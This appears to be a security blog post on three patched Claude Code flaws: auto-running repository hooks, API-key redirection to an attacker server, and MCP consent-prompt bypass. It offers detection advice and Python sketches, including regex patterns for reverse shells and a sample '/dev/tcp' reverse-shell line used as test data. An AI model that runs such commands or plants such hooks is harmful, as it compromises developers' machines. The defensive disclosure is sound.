Check Point Research has uncovered and disclosed three critical security vulnerabilities in Anthropic's AI-powered coding assistant, Claude Code. These flaws, which have since been patched, exposed developers to silent system compromise. The most severe vulnerability (CVE-2025-59536) could allow an attacker to achieve remote code execution (RCE) on a developer's machine merely by tricking them into opening a malicious code repository. Other flaws enabled the theft of API keys (CVE-2026-21852) and the bypassing of user consent mechanisms. The findings underscore the emerging threat landscape where the tools designed to accelerate development can themselves become potent attack vectors.
The vulnerabilities stemmed from the insecure handling of repository-based configuration files within the Claude Code environment. An attacker could craft a malicious project that, when opened, would trigger these flaws without further user interaction.
Code Injection via 'Hooks' (CVE-2025-59536): This high-severity flaw was found in a feature that allows user-defined scripts, or 'Hooks,' to execute automatically when a project is launched. Researchers discovered they could embed a malicious shell command (e.g., a reverse shell) within a project's configuration file. When a developer opened this malicious project, the hook would execute instantly, giving the attacker full control over the victim's machine before any trust prompt could be displayed.
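The danger of auto-executing hooks can be sketched in a few lines. The file shape and field names below are illustrative assumptions, not Claude Code's actual schema; the point is that a command string sourced from the repository itself runs on the victim's machine with no trust prompt.

```python
import json
import subprocess

# Hypothetical project-local settings file shipped inside a malicious
# repository. The JSON structure and key names are assumptions made for
# illustration only.
malicious_settings = json.loads("""
{
  "hooks": {
    "on_project_open": "echo attacker-controlled command runs here"
  }
}
""")

def run_project_open_hooks(settings: dict) -> str:
    """Simulates auto-executing a hook without any consent prompt.

    Because the command string comes straight from the repository,
    whoever authored the repo decides what runs on the developer's host.
    """
    command = settings["hooks"]["on_project_open"]
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout.strip()

# A real attack would place a reverse shell here instead of a benign echo.
print(run_project_open_hooks(malicious_settings))
```

The benign `echo` stands in for the reverse shell the researchers embedded; swapping the command string is all an attacker needs to do.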
API Key Exfiltration (CVE-2026-21852): This vulnerability allowed an attacker to manipulate configuration settings to redirect the API traffic from Claude Code to an attacker-controlled server. This would cause the tool to send its own sensitive API keys—used to communicate with Anthropic's backend services—directly to the attacker. These keys could potentially grant access to an entire team's shared cloud resources, leading to data theft or modification.
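A simple defensive check against this class of redirection is to validate the configured API endpoint against an allowlist of known hosts before any key is sent. This is a minimal sketch, assuming the API base URL is user-configurable; `api.anthropic.com` is used as the expected legitimate host.

```python
from urllib.parse import urlparse

# Assumption for illustration: the legitimate backend lives on this host.
TRUSTED_API_HOSTS = {"api.anthropic.com"}

def is_trusted_endpoint(base_url: str) -> bool:
    """Return True only if the configured base URL points at a known host."""
    host = urlparse(base_url).hostname or ""
    return host.lower() in TRUSTED_API_HOSTS

print(is_trusted_endpoint("https://api.anthropic.com/v1"))  # → True
print(is_trusted_endpoint("https://attacker.example/v1"))   # → False
```

Comparing the parsed hostname (rather than doing a substring match on the URL) also rejects look-alike endpoints such as `https://api.anthropic.com.evil.example/v1`.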
Model Context Protocol (MCP) Abuse: A third flaw involved the abuse of MCP integrations, where settings could be manipulated to bypass user consent prompts for actions performed by the AI, such as executing external tools or accessing files.
There is no evidence that these vulnerabilities were exploited in the wild. Check Point Research responsibly disclosed all findings to Anthropic between July and October 2025, and Anthropic has confirmed that all reported issues have been remediated.
The potential impact on developers and organizations using Claude Code was severe: full remote code execution on developer workstations, theft of API credentials granting access to shared cloud resources, and unauthorized AI-driven actions, all triggered simply by opening a project.
This research highlights a fundamental shift in the threat model for developers. The act of 'opening a project' in a modern, AI-integrated IDE can no longer be considered a safe, read-only operation.
Detecting exploitation of these vulnerabilities would require monitoring for anomalous behavior originating from the development environment:
Process monitoring: Watch for the Claude Code or IDE process spawning unexpected child shells (bash, sh, powershell.exe) or network utilities (curl, wget). This is a key principle of D3FEND's Process Analysis (D3-PA).
Network monitoring: Exploitation of the API key exfiltration flaw (CVE-2026-21852) would be visible as traffic to a non-Anthropic endpoint.
Configuration auditing: Inspect repository configuration files (.claude-hooks, .vscode/settings.json) for suspicious scripts or URL redirects.
Ensuring the Claude Code tool is updated to the latest patched version is the primary defense.
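The configuration-auditing idea can be sketched as a heuristic scan of repository config files for common reverse-shell and download-and-execute indicators. The pattern list below is an illustrative assumption, not an exhaustive detection rule.

```python
import re

# Illustrative indicators only; a production rule set would be broader
# and tuned against false positives.
SUSPICIOUS_PATTERNS = [
    r"/dev/tcp/",                 # bash reverse-shell idiom
    r"\bnc\b.*\s-e\b",            # netcat with -e (execute a program)
    r"curl[^|\n]*\|\s*(ba)?sh",   # download piped straight into a shell
    r"powershell[^\n]*-enc",      # encoded PowerShell payload
]

def find_suspicious(config_text: str) -> list[str]:
    """Return every indicator pattern that matches the config text."""
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, config_text)]

sample = '{"hooks": {"open": "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"}}'
print(find_suspicious(sample))  # → ['/dev/tcp/']
```

Running such a scan over files like `.claude-hooks` or `.vscode/settings.json` before trusting a freshly cloned repository gives a cheap first line of triage.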
Running development environments in isolated containers can prevent a compromise from affecting the host system or network.
Carefully review and harden the configuration of development tools to disable potentially dangerous features like automatic script execution.
Educate developers about the risks of opening untrusted projects from the internet.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.